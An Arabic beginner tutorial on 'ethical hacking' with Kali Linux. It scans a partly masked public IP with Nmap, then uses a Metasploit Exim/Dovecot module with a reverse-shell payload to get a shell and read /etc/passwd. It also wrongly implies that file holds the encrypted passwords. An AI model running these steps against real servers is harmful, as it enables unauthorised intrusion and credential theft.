تعلم استخدام اداة Nmap على Kali Linux

تعلم كيفية استخدام اداة Nmap لعمل اختبار على موقعك وذلك لاكتشاف البورتات المفتوحة ومن ثم شرح مثال بسيط لكيفية استغلال تلك المعلومة

معاذ الاعذلمنذ 5 سنوات

بسم الله الرحمن الرحيم

 

ان مادة الـEthical Haking تعد احد اهم المواد التي يجب تعلمها على كل من كان اهتمامه متعلق بمجال أمن المعلومات, حيث انها تحوي على عدد من الدروس التطبيقية والنظريات التي تعد حصاد سنين من خبراء امنية المعلومات.

يمكن للمبتدئين تعلم هذه المادة, حيث انها لا تشترط خبرات معقدة كتلك التي لدى المحترفين، وتهدف إلى بناء خبرة عملية في إختبار الإختراق من خلال تعلم استخدام توزيعة Kali Linux المخصصة للأمن والحماية.

ساقوم اليوم بشرح استخدام اداة Nmap والتي تعد واحدة من اهم ادوات Kali Linux التي تقوم باختبار جميع الـPorts الخاصة بالموقع  الهدف وتحديد إيها متاح, حيث ان البورتات المفتوحة تعتبر الطريق الاول لدخول الهاكرز واختراق المواقع بها.

ان اول خطوة يجب علينا القيام بها هو معرفة عنوان الـIP الخاص بالموقع الذي سوف يتم اختبارة باستخدام الاداه. يمكنك استخدام موقع VirusTotal لمعرفة عنوان الـIP عن طريق اعطائه عنوان الـURL الخاص بالموقع الذي سوف يتم إختباره.

صورة 1

بعد  الفحص نضغط على تبويب ادوات اضافية ومن ثم نقوم بنسخ عنوان الـIP.

صورة 2

الخطوة الثانية, قم بفتح الـTerminal بعد تشغيل Kali Linux ومن ثم قم بكتابة الأمر التالي

nmap -sS -sV 80.***.***.151 

ان هذا الامر سوف يساعدنا على عرض جميع البورتات المفتوحة الخاصة بعنوان الـIP الهدف.

الخطوة الثالثة, نقوم بنسخ احد البورتات المتاحة

صورة 3

 

كما ترى يمكنك رؤية جميع البورتات المفتوحة في العنوان المحدد , والان سنتعلم قليلاً حول كيفية استخدام معلومة كهذه.

قم بفتح Terminal جديد ومن ثم كتابة الامر Msfconsole

ومن ثم قم بكتابة الامر التالي 

Use exploit/linux/smtp/exim4_dovecot_exec

في الامر السابق قمنا بتحديد احد الـModels الخاصة بـMetasploit والتي تستخدم من اجل الاختراق عن طريق Msfconsole.

ثم قم بكتابة الامر التالي بحيث يتضمن عنوان الـIP الخاص بالهدف 

set Rhost 80.***.***.151

صورة 5

بعد ذلك قم بتحديد الـPort الهدف الذي قمت باختيارة عبر الامر التالي 

set Rport 578

بعد ذلك نقوم بكتابة الامر show payloads وذلك لعرض كل الـpayloads

صورة 6

بعد ذلك نقوم بكتابة الامر التالي

 set payload generic/shell_reverse_tcp

 

صورة 7

تالياً قم بكتابة عنوان الـIP الخاص بالجهاز المحلي كالتالي

set Lhost 192.***.***.048

صورة 8

في البداية كتبنا set Rhost 80.***.***.151 وهذا يعتبر الطرف الايمن والذي سيتم اختراقه ومن ثم قمنا بكتابة set Lhost 192.***.***.048 والذي يمثل الطرف الايسر الذي يقوم بالاختراق 

والان بعد ما حددنا الاطراف سنقوم بالتنفيذ عن طريق كتابة الامر exploit

صورة 9

ثم نقوم بكتابة الامر ls -la وذلك لعرض قائمة الملفات الخاصة بالهدف 

صورة 10

ثم قم بكتابة الامر Cat /etc/passwd

صورة 11

هكذا قمنا بفتح محتوى ملف الـpasswd الخاص بالهدف والذي يحوي على معلومات المستخدمين ومن ضمنها كلمات المرور ولكنها مشفرة.

1
إعجاب
10870
مشاهدات
0
مشاركة
4
متابع

التعليقات (1)

عبدالرحمن:

كمل جميلك وقلنا وش بعد مانطلعها كيف نقدر نفك تشفيرها هههههه

لايوجد لديك حساب في عالم البرمجة؟

تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !